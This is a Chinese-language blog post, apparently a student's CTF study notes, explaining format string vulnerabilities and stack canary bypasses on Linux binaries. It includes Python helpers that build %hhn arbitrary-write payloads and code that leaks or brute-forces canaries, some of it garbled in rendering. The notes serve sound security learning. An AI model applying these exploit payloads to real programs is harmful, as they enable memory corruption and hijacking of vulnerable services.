<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/qsc.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/qsc.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.25.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"foundation","dark":"foundation"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="从冬季培训的pwn题fmt中受益匪浅  格式化字符串漏洞介绍">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn学习记录（其四）">
<meta property="og:url" content="http://example.com/posts/2a691734/">
<meta property="og:site_name" content="qsc">
<meta property="og:description" content="从冬季培训的pwn题fmt中受益匪浅  格式化字符串漏洞介绍">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-11-12T16:00:00.000Z">
<meta property="article:modified_time" content="2025-11-13T04:41:09.434Z">
<meta property="article:author" content="qsc">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/posts/2a691734/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/posts/2a691734/","path":"posts/2a691734/","title":"pwn学习记录（其四）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>pwn学习记录（其四） | qsc</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">qsc</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">早上好中午好下午好晚上好 </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">6</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">4</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">9</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">格式化字符串漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">1.3.</span> <span class="nav-text">利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%B4%A9%E6%BA%83"><span class="nav-number">1.4.</span> <span class="nav-text">程序崩溃</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E5%86%85%E5%AD%98"><span class="nav-number">1.5.</span> <span class="nav-text">泄露内存</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E6%A0%88%E5%86%85%E5%AD%98"><span class="nav-number">1.5.1.</span> <span class="nav-text">泄露栈内存</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">1.5.2.</span> <span class="nav-text">泄露任意地址内存</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E5%86%85%E5%AD%98"><span class="nav-number">1.6.</span> <span class="nav-text">覆盖内存</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E6%A0%88%E5%86%85%E5%AD%98"><span class="nav-number">1.7.</span> <span class="nav-text">覆盖栈内存</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">1.8.</span> <span class="nav-text">覆盖任意地址内存</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E5%B0%8F%E6%95%B0%E5%AD%97"><span class="nav-number">1.8.1.</span> <span class="nav-text">覆盖小数字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E5%A4%A7%E6%95%B0%E5%AD%97"><span class="nav-number">1.8.2.</span> <span class="nav-text">覆盖大数字</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#canary%E7%BB%95%E8%BF%87"><span class="nav-number">2.</span> <span class="nav-text">canary绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#canary%E4%BB%8B%E7%BB%8D"><span class="nav-number">2.1.</span> <span class="nav-text">canary介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#canary%E6%B3%84%E9%9C%B2"><span class="nav-number">2.2.</span> <span class="nav-text">canary泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#canary%E7%BB%95%E8%BF%87-1"><span class="nav-number">2.3.</span> <span class="nav-text">canary绕过</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="qsc"
      src="/images/qsc.jpg">
  <p class="site-author-name" itemprop="name">qsc</p>
  <div class="site-description" itemprop="description">记录学习日常</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Qs-C" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Qs-C" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto://1744326850@qq.com" title="E-Mail → mailto:&#x2F;&#x2F;1744326850@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/posts/2a691734/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/qsc.jpg">
      <meta itemprop="name" content="qsc">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="qsc">
      <meta itemprop="description" content="记录学习日常">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="pwn学习记录（其四） | qsc">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pwn学习记录（其四）
        </h1>

        <div class="post-meta-container">

          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-11-13 00:00:00 / 修改时间：12:41:09" itemprop="dateCreated datePublished" datetime="2025-11-13T00:00:00+08:00">2025-11-13</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>6 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><blockquote>
<p>从冬季培训的pwn题fmt中受益匪浅</p>
</blockquote>
<h1 id="格式化字符串漏洞"><a href="#格式化字符串漏洞" class="headerlink" title="格式化字符串漏洞"></a>格式化字符串漏洞</h1><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>格式化字符串的基本格式<br><code>%[parameter][flags][field width][.precision][length]type</code><br>其中</p>
<ul>
<li>parameter <ul>
<li>n$ 可以获取格式化字符串中的指定参数</li>
</ul>
</li>
<li>length 输出的长度<ul>
<li>hh 输出一个字节</li>
<li>h 输出一个双字节</li>
</ul>
</li>
<li>type<ul>
<li>s 如果没有用 l 标志，输出 null 结尾字符串直到精度规定的上限；如果没有指定精度，则输出所有字节。如果用了 l 标志，则对应函数参数指向 wchar_t 型的数组，输出时把每个宽字符转化为多字节字符，相当于调用 wcrtomb 函数。</li>
<li>c 如果没有用 l 标志，把 int 参数转为 unsigned char 型输出；如果用了 l 标志，把 wint_t 参数转为包含两个元素的 wchart_t 数组，其中第一个元素包含要输出的字符，第二个元素为 null 宽字符。</li>
<li>p 打印对应变量的值</li>
<li>n 不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量</li>
</ul>
</li>
</ul>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>对于</p>
<pre><code>Input:printf(&quot;Color %s, Number %d, Float %4.2f&quot;,&quot;red&quot;,123456,3.14);
output:Color red,Number 123456,Float 3.14
</code></pre>
<p>也就是说，在进入printf后，函数首先获取第一个参数，一个一个个读字符后会遇到两种情况</p>
<ul>
<li>当前字符不是%，直接输出</li>
<li>当前字符是%，继续读取下一个字符<ul>
<li>如果没有字符，报错<br>  *如果下一个字符是%，输出%</li>
<li>否则根据相应的字符，获得相应的参数，输出</li>
</ul>
</li>
</ul>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>所以，格式化字符串漏洞可以使程序崩溃，或者查看进程内容</p>
<h2 id="程序崩溃"><a href="#程序崩溃" class="headerlink" title="程序崩溃"></a>程序崩溃</h2><p>利用格式化字符串漏洞使程序崩溃是最简单的利用方式，只需要输入若干个%s即可，因为栈上不可能每个值都对应合法的地址，总有地址可以使程序崩溃。</p>
<h2 id="泄露内存"><a href="#泄露内存" class="headerlink" title="泄露内存"></a>泄露内存</h2><ul>
<li>泄露栈内存 可以获取栈上某个变量的值或对应地址的内存</li>
<li>泄露任意地址内存 利用GOT表获得libc函数地址，进而获取libc，再获取其他libc函数地址</li>
</ul>
<h3 id="泄露栈内存"><a href="#泄露栈内存" class="headerlink" title="泄露栈内存"></a>泄露栈内存</h3><p>通过格式化字符串可以获取栈上变量的值<br>如果输入<code>AAA %p %p %p %p %p...</code><br>再调用printf函数，就能依次获得栈中的每个参数，同时也可以知道输入的字符串被放在栈上的第几个参数处<br>当然，通过<code>%n$x</code><br>就可以直接获得栈上的第n+1个参数<br>而通过%s，则可以获得栈变量对应的字符串</p>
<blockquote>
<p>不过平时推荐用%p,可以不考虑位数和零截断的问题</p>
</blockquote>
<h3 id="泄露任意地址内存"><a href="#泄露任意地址内存" class="headerlink" title="泄露任意地址内存"></a>泄露任意地址内存</h3><p>将需要泄露函数的GOT表放入栈中，通过%n$s打印地址，就可以获取指定地址的内容<br>但是需要注意的是，如果格式化字符串在栈上，就要确定格式化字符串的相对偏移，因为在函数调用时栈指针至少低于格式化字符串地址 8 字节或者 16 字节。<br>可以通过上文泄露栈内存中提到的方法确定，也可以通过动态调试找到</p>
<h2 id="覆盖内存"><a href="#覆盖内存" class="headerlink" title="覆盖内存"></a>覆盖内存</h2><p>同理，通过%n可以修改栈上甚至任意地址变量的内存<br>基本格式为<code>f&quot;%&#123;value&#125;c%[offset]$hn&quot;.encode()+p64(addr)</code><br>value中为要覆盖的内容，offset为要覆盖的地址存储的位置为输出函数的格式化字符串的第几个参数，addr为所要覆盖的地址</p>
<h2 id="覆盖栈内存"><a href="#覆盖栈内存" class="headerlink" title="覆盖栈内存"></a>覆盖栈内存</h2><p>通过动态调试找到偏移量在构造payload进行修改</p>
<h2 id="覆盖任意地址内存"><a href="#覆盖任意地址内存" class="headerlink" title="覆盖任意地址内存"></a>覆盖任意地址内存</h2><h3 id="覆盖小数字"><a href="#覆盖小数字" class="headerlink" title="覆盖小数字"></a>覆盖小数字</h3><p>对于小数字，与上文中读取类似，将地址和内容放入栈中即可<br>要注意的是，填充字符使字节对齐</p>
<h3 id="覆盖大数字"><a href="#覆盖大数字" class="headerlink" title="覆盖大数字"></a>覆盖大数字</h3><p>利用%hhn向地址写入单字节或用%hn向地址中写如双字节<br>分次放入<br>从网上获得基本构造如下</p>
<pre><code>def fmt(prev, word, index):
if prev &lt; word:
    result = word - prev
    fmtstr = &quot;%&quot; + str(result) + &quot;c&quot;
elif prev == word:
    result = 0
else:
    result = 256 + word - prev
    fmtstr = &quot;%&quot; + str(result) + &quot;c&quot;
fmtstr += &quot;%&quot; + str(index) + &quot;$hhn&quot;
return fmtstr

def fmt_str(offset, size, addr, target):
    payload = &quot;&quot;
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target &gt;&gt; i * 8) &amp; 0xff, offset + i)
        prev = (target &gt;&gt; i * 8) &amp; 0xff
    return payload
payload = fmt_str(6,4,0x0804A028,0x12345678)
</code></pre>
<p>其中每个参数的含义基本如下</p>
<ul>
<li>offset 表示要覆盖的地址最初的偏移</li>
<li>size 表示机器字长</li>
<li>addr 表示将要覆盖的地址。</li>
<li>target 表示我们要覆盖为的目的变量值。</li>
</ul>
<h1 id="canary绕过"><a href="#canary绕过" class="headerlink" title="canary绕过"></a>canary绕过</h1><h2 id="canary介绍"><a href="#canary介绍" class="headerlink" title="canary介绍"></a>canary介绍</h2><p>栈溢出保护是一种缓冲区溢出攻击缓解手段，当函数存在缓冲区溢出攻击漏洞时，攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行。当启用栈保护后，函数开始执行的时候会先往栈底插入 cookie 信息，当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变)，如果不合法就停止程序运行 (栈溢出发生)。攻击者在覆盖返回地址的时候往往也会将 cookie 信息给覆盖掉，导致栈保护检查失败而阻止 shellcode 的执行，避免漏洞利用成功。在 Linux 中我们将 cookie 信息称为 Canary。<br>这个值储存在rbp-8的地方</p>
<h2 id="canary泄露"><a href="#canary泄露" class="headerlink" title="canary泄露"></a>canary泄露</h2><p>可以通过格式化字符串泄露canary信息<br>或者首先通过覆盖Canary最后一个\x00字节来打印出4位的Canary之后，计算好偏移，将Canary填入到相应的溢出位置，实现Ret到getshell函数中</p>
<pre><code># leak Canary
payload = &quot;A&quot;*offset
io.sendline(payload)
io.recvuntil(&quot;A&quot;*offset)
Canary = u32(io.recv(4))-0xa
log.info(&quot;Canary:&quot;+hex(Canary))
</code></pre>
<p>也可以在子进程中逐字节爆破canary<br>    print “[+] Brute forcing stack canary “<br>    start &#x3D; len(p)<br>    stop &#x3D; len(p)+8<br>    while len(p) &lt; stop:<br>        for i in xrange(0,256):<br>        res &#x3D; send2server(p + chr(i))</p>
<pre><code>    if res != &quot;&quot;:
        p = p + chr(i)
        #print &quot;\t[+] Byte found 0x%02x&quot; % i
        break

      if i == 255:
        print &quot;[-] Exploit failed&quot;
        sys.exit(-1)
canary = p[stop:start-1:-1].encode(&quot;hex&quot;)
print &quot;   [+] SSP value is 0x%s&quot; % canary
</code></pre>
<h2 id="canary绕过-1"><a href="#canary绕过-1" class="headerlink" title="canary绕过"></a>canary绕过</h2><p>在获得canary后只需要在填充栈和缓冲区的字节间加上canary即可</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/d05aad03/" rel="prev" title="pwn学习记录（其三）">
                  <i class="fa fa-angle-left"></i> pwn学习记录（其三）
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">qsc</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    total words&asymp;<span title="站点总字数">12k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">23 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        visitors:<span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        views:<span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>

</body>
</html>
